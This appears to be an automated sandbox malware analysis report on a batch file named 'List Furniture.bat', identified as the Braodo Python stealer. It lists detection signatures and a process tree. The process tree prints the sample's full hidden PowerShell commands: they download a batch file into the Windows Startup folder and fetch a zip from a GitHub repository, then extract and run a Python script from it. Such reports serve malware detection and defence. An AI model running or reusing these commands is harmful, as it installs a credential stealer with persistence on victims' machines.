Edit tour
Windows
Analysis Report
List Furniture.bat
Overview
General Information
Detection
Python Stealer, Braodo
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Braodo
Yara detected Powershell download and execute
AI detected suspicious sample
Found large BAT file
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell DownloadFile
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Yara detected Generic Python Stealer
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Command Line Execution with Suspicious URL and AppData Strings
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Download - PoshModule
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 5508 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\List Furniture. bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4068 cmdline:
cmd /c sta rt /min po wershell.e xe -Window Style Hidd en -Comman d "[Net.Se rvicePoint Manager]:: SecurityPr otocol = [ Net.Securi tyProtocol Type]::Tls 12; (New-O bject -Typ eName Syst em.Net.Web Client).Do wnloadFile ('https:// github.com /PTT2k5/LT L203/raw/m ain/update 2.bat', '% APPDATA%\\ Microsoft\ \Windows\\ Start Menu \\Programs \\Startup\ \WindowsSe cure.bat') ";powershe ll.exe -Wi ndowStyle Hidden -Co mmand "[Ne t.ServiceP ointManage r]::Securi tyProtocol = [Net.Se curityProt ocolType]: :Tls12; (N ew-Object -TypeName System.Net .WebClient ).Download File('http s://github .com/PTT2k 5/LTL203/r aw/main/Do cument2.zi p', 'C:\\U sers\\Publ ic\\Docume nt.zip'); Add-Type - AssemblyNa me System. IO.Compres sion.FileS ystem; [Sy stem.IO.Co mpression. ZipFile]:: ExtractToD irectory(' C:/Users/P ublic/Docu ment.zip', 'C:/Users /Public/Do cument'); Start-Slee p -Seconds 1; C:\\Us ers\\Publi c\\Documen t\\python. exe C:\\Us ers\\Publi c\\Documen t\\Lib\\si m.py; del C:/Users/P ublic/Docu ment.zip" exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 5940 cmdline:
powershell .exe -Wind owStyle Hi dden -Comm and "[Net. ServicePoi ntManager] ::Security Protocol = [Net.Secu rityProtoc olType]::T ls12; (New -Object -T ypeName Sy stem.Net.W ebClient). DownloadFi le('https: //github.c om/PTT2k5/ LTL203/raw /main/upda te2.bat', 'C:\Users\ user\AppDa ta\Roaming \\Microsof t\\Windows \\Start Me nu\\Progra ms\\Startu p\\Windows Secure.bat ')";powers hell.exe - WindowStyl e Hidden - Command "[ Net.Servic ePointMana ger]::Secu rityProtoc ol = [Net. SecurityPr otocolType ]::Tls12; (New-Objec t -TypeNam e System.N et.WebClie nt).Downlo adFile('ht tps://gith ub.com/PTT 2k5/LTL203 /raw/main/ Document2. zip', 'C:\ \Users\\Pu blic\\Docu ment.zip') ; Add-Type -Assembly Name Syste m.IO.Compr ession.Fil eSystem; [ System.IO. Compressio n.ZipFile] ::ExtractT oDirectory ('C:/Users /Public/Do cument.zip ', 'C:/Use rs/Public/ Document') ; Start-Sl eep -Secon ds 1; C:\\ Users\\Pub lic\\Docum ent\\pytho n.exe C:\\ Users\\Pub lic\\Docum ent\\Lib\\ sim.py; de l C:/Users /Public/Do cument.zip " exit MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6640 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -WindowSty le Hidden -Command [ Net.Servic ePointMana ger]::Secu rityProtoc ol = [Net. SecurityPr otocolType ]::Tls12 MD5: 04029E121A0CFA5991749937DD22A1D9) - python.exe (PID: 5488 cmdline:
"C:\Users\ Public\Doc ument\pyth on.exe" C: \\Users\\P ublic\\Doc ument\\Lib \\sim.py MD5: C6ED974729D66DC7877BDE3E966B460D)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Braodo_1 | Yara detected Braodo | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Jonathan Cheong, oscd.community: |